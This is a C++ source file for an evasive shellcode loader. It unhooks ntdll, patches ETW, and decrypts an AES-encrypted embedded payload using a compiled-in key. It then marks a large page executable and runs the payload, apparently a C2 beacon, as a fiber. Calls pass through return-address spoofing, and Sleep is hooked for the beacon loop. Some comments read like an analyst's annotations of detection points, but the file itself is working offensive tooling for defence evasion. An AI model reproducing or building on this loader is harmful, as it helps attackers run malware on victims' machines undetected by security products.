/* Evasive shellcode loader designed to hide its execution from userland/kernel-land detections */
#include <iostream>
#include "allocator.h"
#include "resolvers.h"
#include "unhook.h"
#include "retaddrspoof.h"
#include "defs.h"
#include "etw.h"
#include "AES.h"
#include "hook.h"
#include "rsrc.h"
#include "functions.h"
// File-scope state shared with the rest of the project (several of these are referenced only
// from other translation units; nothing here is thread-safe or re-entrant, it is plain globals).
// Gdgt is resolved by a dynamic initializer, i.e. FindROPGadget() runs before main() is entered.
PVOID Gdgt = FindROPGadget(); // used all across the project for ret address spoofing
LPVOID InitialFiber;          // handle of the original thread-turned-fiber, set in main() via e_ConvertThreadToFiber
unsigned char* rc4key;        // not referenced in this file; presumably consumed elsewhere in the project
unsigned long rc4keysize;     // not referenced in this file
NTSTATUS status;              // return code of the NtProtectVirtualMemory call in main()
SIZE_T lpDataSize;            // not referenced in this file
PLARGE_PAGE_INFORMATION pLPI; // large-page allocation returned by allocate_large_page(); lpPage/uSize/lpData are read in main()
// Key (32 bytes) and IV (16 bytes) are compiled into the binary as plain constants. For an analyst this
// means the embedded resource can be decrypted offline from the sample alone; the key length suggests
// AES-256, but the actual mode/key handling lives in AESDecrypt (AES.h), which is not shown here.
unsigned char AesKey[] = { 0xBD, 0x19, 0x3D, 0x27, 0x69, 0x8C, 0xC6, 0x80, 0x86, 0x53, 0x8F, 0x3A, 0x53, 0x82, 0x16, 0x85, 0x9C, 0x01, 0x7C, 0xF3, 0xF9, 0xCA, 0x39, 0x1C, 0x08, 0x61, 0x6E, 0x05, 0x6F, 0x74, 0x7B, 0x08 };
unsigned char AesIv[] = { 0xAD, 0xC7, 0xC0, 0x5B, 0xA8, 0xAB, 0x80, 0x21, 0x95, 0x8E, 0x46, 0xD6, 0x15, 0x6B, 0x8B, 0xA0 };
/* AES vars */
PBYTE AesCipherText;          // malloc'd copy of the embedded resource; freed with free() in main()
BOOL decryption;              // AESDecrypt() success flag
PVOID pPlainBuffer = nullptr; // output buffer filled by AESDecrypt(); released with delete[] in main()
DWORD PlainBufferSize = 0;    // output length filled by AESDecrypt()
PVOID ptr = nullptr;          // pointer to the raw resource bytes, set by GetFromRc()
DWORD ResourceSize;           // size of the raw resource, set by GetFromRc()
LPVOID Creation = nullptr;    // handle of the payload fiber created by e_CreateFiber
PVOID lpParameter = nullptr;  // fiber parameter passed to e_ConvertThreadToFiber (always null here)
// Entry point. Sequence as implemented below: restore/patch system DLL state, pull the encrypted
// payload out of a PE resource, decrypt it, copy it into an executable large page, and run it as a
// fiber that is switched to in a loop. Almost every Win32 call goes through RetSpoofCall() with the
// ROP gadget Gdgt so the return address on the stack does not point back into this module.
// Detection-relevant behaviours visible in this function: writes to ntdll (FlushNTDLL), ETW
// tampering (PatchETW), an inline hook on Sleep, NtProtectVirtualMemory to PAGE_EXECUTE_READ on a
// freshly allocated large page, and fiber-based execution (ConvertThreadToFiber/CreateFiber/SwitchToFiber).
int main() {
FlushNTDLL();  // from unhook.h; by its name presumably re-maps/restores ntdll — body not shown here
PatchETW();    // from etw.h; by its name presumably disables ETW event emission — body not shown here
GetFromRc(ResourceSize, ptr); // locate the embedded resource: fills ResourceSize and ptr
// Copy the resource into a heap buffer; memcpy is invoked through the gadget rather than directly.
AesCipherText = (PBYTE)malloc((SIZE_T)ResourceSize);
RetSpoofCall((void*)memcpy, 3, Gdgt, AesCipherText, ptr, (SIZE_T)ResourceSize);
// Decrypt with the compiled-in key/IV; AESDecrypt allocates pPlainBuffer and sets PlainBufferSize.
decryption = AESDecrypt(
AesCipherText,
ResourceSize,
AesKey,
AesIv,
&pPlainBuffer,
&PlainBufferSize
);
if (!decryption) {
std::cout << "[+] Decryption UnSuccessful" << std::endl;
return -1;
}
// Move the plaintext into a large page at a randomised offset, then release both staging buffers.
pLPI = allocate_large_page(PlainBufferSize);
place_data_rand(pLPI, (PBYTE)pPlainBuffer, PlainBufferSize);
free(AesCipherText);
// NOTE(review): pPlainBuffer is a PVOID, so delete[] here is deleting through void*; whether it matches
// how AESDecrypt allocated the buffer cannot be confirmed from this file.
delete[] pPlainBuffer;
// Redirect Sleep to FiberSwitcher (hook.h). Per the comment in the loop below, this is how control
// comes back to this function whenever the payload calls Sleep — FiberSwitcher itself is not shown.
HookFunction(Sleep, FiberSwitcher);
InitialFiber = (LPVOID)RetSpoofCall((void*)e_ConvertThreadToFiber, 1, Gdgt, lpParameter); // converted the current thread to fiber (InitialFiber)
#ifdef _DEBUG_PRINT
std::cout << "[DEBUG] Converted current thread to fiber\n";
#endif
// Flip the large page to executable; SELF_HANDLE / NTAPI_VALIDATE_RETURN2NULL are project macros (defs.h presumably).
// This is the point where the region becomes RX — a natural place for memory-protection telemetry to fire.
ULONG OldAccessProtection = 0;
status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)NtProtectVirtualMemory, 5, Gdgt, SELF_HANDLE, &pLPI->lpPage, &pLPI->uSize, PAGE_EXECUTE_READ, &OldAccessProtection));
NTAPI_VALIDATE_RETURN2NULL(NtProtect_MAIN, status);
// The payload's first byte (lpData) becomes the fiber start routine; the fiber is not run until SwitchToFiber below.
Creation = RetSpoofCall((void*)e_CreateFiber, 3, Gdgt, NULL, (LPFIBER_START_ROUTINE)pLPI->lpData, NULL); // Created a New fiber on the EntryPoint (PayloadFiber)
#ifdef _DEBUG_PRINT
std::cout << "[DEBUG] Created the payload fiber\n";
#endif
// Scheduler loop: run the payload fiber; when it calls the hooked Sleep, control returns here and the
// wait is performed by DelayExecution instead. dwSleepTime is not defined in this file — presumably
// set by FiberSwitcher from the payload's Sleep argument (confirm in hook.h). The loop never exits.
while (true) { // main infinite loop
#ifdef _DEBUG_PRINT
std::cout << "[DEBUG] Switching to payload fiber\n";
#endif
RetSpoofCall((void*)e_SwitchToFiber, 1, Gdgt, Creation);
// THIS PART IS EXECUTED AFTER THE BEACON CALLS SLEEP (FiberSwitcher)
#ifdef _DEBUG_PRINT
std::cout << "[DEBUG] Sleeping...\n";
#endif
DelayExecution(dwSleepTime);
// and then back to loop start
}
return 0; // unreachable: the loop above has no break
}